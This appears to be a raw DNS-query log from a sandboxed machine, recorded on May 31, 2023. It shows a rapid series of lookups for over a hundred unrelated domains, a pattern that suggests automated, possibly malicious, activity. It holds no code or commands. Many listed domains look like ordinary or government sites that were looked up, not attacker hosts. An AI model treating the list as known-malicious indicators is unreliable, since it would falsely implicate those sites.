                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.374452114 CEST8.8.8.8192.168.2.30x284aNo error (0)shesfit.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.374452114 CEST8.8.8.8192.168.2.30x284aNo error (0)shesfit.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.376199007 CEST8.8.8.8192.168.2.30xa652No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.388370037 CEST8.8.8.8192.168.2.30x13c7Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.393640041 CEST8.8.8.8192.168.2.30x946aNo error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.393640041 CEST8.8.8.8192.168.2.30x946aNo error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.393640041 CEST8.8.8.8192.168.2.30x946aNo error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.399043083 CEST8.8.8.8192.168.2.30x8fe1No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.414629936 CEST8.8.8.8192.168.2.30x3844No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.415257931 CEST8.8.8.8192.168.2.30x41ecNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.456513882 CEST8.8.8.8192.168.2.30x5dd0No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.465939045 CEST8.8.8.8192.168.2.30xe409Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.467811108 CEST8.8.8.8192.168.2.30x5c41No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.469868898 CEST8.8.8.8192.168.2.30xe5d7No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.474718094 CEST8.8.8.8192.168.2.30x2344No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.485013008 CEST8.8.8.8192.168.2.30x32f2No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.503453016 CEST8.8.8.8192.168.2.30x533fNo error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.505336046 CEST8.8.8.8192.168.2.30x8ef0No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.506321907 CEST8.8.8.8192.168.2.30x383Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.530330896 CEST8.8.8.8192.168.2.30x6e6cNo error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.530330896 CEST8.8.8.8192.168.2.30x6e6cNo error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.530587912 CEST8.8.8.8192.168.2.30x398fServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.578010082 CEST8.8.8.8192.168.2.30x6e32No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.581702948 CEST8.8.8.8192.168.2.30xc589No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.599662066 CEST8.8.8.8192.168.2.30xa458No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.600056887 CEST8.8.8.8192.168.2.30xa023No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.610353947 CEST8.8.8.8192.168.2.30xe239No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.610353947 CEST8.8.8.8192.168.2.30xe239No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.611222982 CEST8.8.8.8192.168.2.30xb9b0No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.628407955 CEST8.8.8.8192.168.2.30x691eNo error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.644763947 CEST8.8.8.8192.168.2.30xd60eNo error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.652158022 CEST8.8.8.8192.168.2.30xc28dNo error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.652879953 CEST8.8.8.8192.168.2.30xb561No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.652879953 CEST8.8.8.8192.168.2.30xb561No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.659681082 CEST8.8.8.8192.168.2.30xc72No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.662581921 CEST8.8.8.8192.168.2.30x9416No error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.664216995 CEST8.8.8.8192.168.2.30x2670Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.665003061 CEST8.8.8.8192.168.2.30xe219No error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.694720984 CEST8.8.8.8192.168.2.30x974Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.727583885 CEST8.8.8.8192.168.2.30x6ca1No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.738692999 CEST8.8.8.8192.168.2.30xc278No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.747755051 CEST8.8.8.8192.168.2.30x8653No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.754163980 CEST8.8.8.8192.168.2.30xb601No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.754163980 CEST8.8.8.8192.168.2.30xb601No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.774075031 CEST8.8.8.8192.168.2.30x9c4cNo error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.774075031 CEST8.8.8.8192.168.2.30x9c4cNo error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.835700035 CEST8.8.8.8192.168.2.30x8745No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.852034092 CEST8.8.8.8192.168.2.30x512fNo error (0)hyab.se188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.852034092 CEST8.8.8.8192.168.2.30x512fNo error (0)hyab.se188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.985321999 CEST8.8.8.8192.168.2.30x47d3Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.023338079 CEST8.8.8.8192.168.2.30x2952No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.027349949 CEST8.8.8.8192.168.2.30xef75Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.036252022 CEST8.8.8.8192.168.2.30xaaNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.036252022 CEST8.8.8.8192.168.2.30xaaNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.045120001 CEST8.8.8.8192.168.2.30x1adaNo error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.045120001 CEST8.8.8.8192.168.2.30x1adaNo error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.045623064 CEST8.8.8.8192.168.2.30xc5edNo error (0)oh28ya.com52.194.81.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.045623064 CEST8.8.8.8192.168.2.30xc5edNo error (0)oh28ya.com3.113.205.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.048432112 CEST8.8.8.8192.168.2.30x9bNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.048432112 CEST8.8.8.8192.168.2.30x9bNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.048432112 CEST8.8.8.8192.168.2.30x9bNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.065205097 CEST8.8.8.8192.168.2.30xcbb7Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.065885067 CEST8.8.8.8192.168.2.30x7c07No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.070966959 CEST8.8.8.8192.168.2.30xf235No error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.120805979 CEST8.8.8.8192.168.2.30x1390Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.139839888 CEST8.8.8.8192.168.2.30xa7d6No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.139839888 CEST8.8.8.8192.168.2.30xa7d6No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.163853884 CEST8.8.8.8192.168.2.30x4413No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.195688009 CEST8.8.8.8192.168.2.30x7368No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.196233034 CEST8.8.8.8192.168.2.30x647eNo error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.226878881 CEST8.8.8.8192.168.2.30x41d1No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.226878881 CEST8.8.8.8192.168.2.30x41d1No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.226878881 CEST8.8.8.8192.168.2.30x41d1No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.226878881 CEST8.8.8.8192.168.2.30x41d1No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.228458881 CEST8.8.8.8192.168.2.30x4b2aNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.228821993 CEST8.8.8.8192.168.2.30x8d24No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.250828981 CEST8.8.8.8192.168.2.30x9394No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.289073944 CEST8.8.8.8192.168.2.30x4f43No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.307437897 CEST8.8.8.8192.168.2.30x6c3cNo error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.315464973 CEST8.8.8.8192.168.2.30xb0f6No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.317668915 CEST8.8.8.8192.168.2.30x9113No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.317668915 CEST8.8.8.8192.168.2.30x9113No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.335925102 CEST8.8.8.8192.168.2.30x7b6bNo error (0)yhsll.com107.186.187.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.336081982 CEST8.8.8.8192.168.2.30x1c96No error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.341615915 CEST8.8.8.8192.168.2.30xfdb9Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.358103037 CEST8.8.8.8192.168.2.30x22ddNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.358103037 CEST8.8.8.8192.168.2.30x22ddNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.367566109 CEST8.8.8.8192.168.2.30x67a2No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.367566109 CEST8.8.8.8192.168.2.30x67a2No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.367566109 CEST8.8.8.8192.168.2.30x67a2No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.391746044 CEST8.8.8.8192.168.2.30xa0caNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.406723976 CEST8.8.8.8192.168.2.30x8c98No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.413849115 CEST8.8.8.8192.168.2.30x2869No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.448489904 CEST8.8.8.8192.168.2.30xea65Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.461078882 CEST8.8.8.8192.168.2.30x8c7bNo error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.497982025 CEST8.8.8.8192.168.2.30xd4d3No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.507220984 CEST8.8.8.8192.168.2.30xb438No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.522511959 CEST8.8.8.8192.168.2.30x65b8No error (0)vfcindia.com103.191.209.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.535164118 CEST8.8.8.8192.168.2.30x9533No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.537126064 CEST8.8.8.8192.168.2.30xdf53No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.548917055 CEST8.8.8.8192.168.2.30x1988Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.550878048 CEST8.8.8.8192.168.2.30xb150No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.557913065 CEST8.8.8.8192.168.2.30x863dNo error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.574538946 CEST8.8.8.8192.168.2.30xf4b5Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.607479095 CEST8.8.8.8192.168.2.30xfc93No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.607745886 CEST8.8.8.8192.168.2.30xdc8aNo error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.610163927 CEST8.8.8.8192.168.2.30xee00Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.617552042 CEST8.8.8.8192.168.2.30x9a76No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.671765089 CEST8.8.8.8192.168.2.30xe629No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.684603930 CEST8.8.8.8192.168.2.30xaee8Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.721163034 CEST8.8.8.8192.168.2.30xc1cbNo error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.736011982 CEST8.8.8.8192.168.2.30x73c6No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.741871119 CEST8.8.8.8192.168.2.30x9c9No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.844039917 CEST8.8.8.8192.168.2.30xd681No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.844039917 CEST8.8.8.8192.168.2.30xd681No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.862302065 CEST8.8.8.8192.168.2.30x6ebbNo error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.866426945 CEST8.8.8.8192.168.2.30x974Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.876915932 CEST8.8.8.8192.168.2.30xdf9eNo error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.940793991 CEST8.8.8.8192.168.2.30x2337No error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.970364094 CEST8.8.8.8192.168.2.30x3c31No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.970364094 CEST8.8.8.8192.168.2.30x3c31No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.970364094 CEST8.8.8.8192.168.2.30x3c31No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.973123074 CEST8.8.8.8192.168.2.30xffdcNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.027039051 CEST8.8.8.8192.168.2.30xad3No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.037882090 CEST8.8.8.8192.168.2.30xf030No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.041765928 CEST8.8.8.8192.168.2.30x402No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.049716949 CEST8.8.8.8192.168.2.30xa2bdNo error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.079885006 CEST8.8.8.8192.168.2.30x74b5No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.110357046 CEST8.8.8.8192.168.2.30xaf44Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.140995979 CEST8.8.8.8192.168.2.30x1114No error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.172776937 CEST8.8.8.8192.168.2.30x613bNo error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.180188894 CEST8.8.8.8192.168.2.30x774eNo error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.183734894 CEST8.8.8.8192.168.2.30x2f86No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.184495926 CEST8.8.8.8192.168.2.30x9653No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.202903032 CEST8.8.8.8192.168.2.30xccf7No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.206526995 CEST8.8.8.8192.168.2.30x7747Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.218409061 CEST8.8.8.8192.168.2.30xa042Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.239567041 CEST8.8.8.8192.168.2.30xf1eNo error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.245556116 CEST8.8.8.8192.168.2.30x4682Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.257882118 CEST8.8.8.8192.168.2.30xb62No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.257882118 CEST8.8.8.8192.168.2.30xb62No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.259743929 CEST8.8.8.8192.168.2.30xdd42No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.280975103 CEST8.8.8.8192.168.2.30xdbc5Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.282648087 CEST8.8.8.8192.168.2.30xc16bNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.300380945 CEST8.8.8.8192.168.2.30x54e0No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.333017111 CEST8.8.8.8192.168.2.30xf3e3Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.343427896 CEST8.8.8.8192.168.2.30xe0aeNo error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.345310926 CEST8.8.8.8192.168.2.30x1c9dNo error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.367043018 CEST8.8.8.8192.168.2.30x99c6Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.369126081 CEST8.8.8.8192.168.2.30xfbc4No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.410943031 CEST8.8.8.8192.168.2.30xb6e4No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.502091885 CEST8.8.8.8192.168.2.30x992aName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.537322998 CEST8.8.8.8192.168.2.30x3fccNo error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.543904066 CEST8.8.8.8192.168.2.30x9a58Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.549628973 CEST8.8.8.8192.168.2.30x70bcNo error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.579447985 CEST8.8.8.8192.168.2.30x3692No error (0)rkengg.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.579447985 CEST8.8.8.8192.168.2.30x3692No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.579447985 CEST8.8.8.8192.168.2.30x3692No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.579447985 CEST8.8.8.8192.168.2.30x3692No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.605137110 CEST8.8.8.8192.168.2.30x459fName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.606439114 CEST8.8.8.8192.168.2.30xde7eNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.675354004 CEST8.8.8.8192.168.2.30x8a82No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.731547117 CEST8.8.8.8192.168.2.30x217eNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
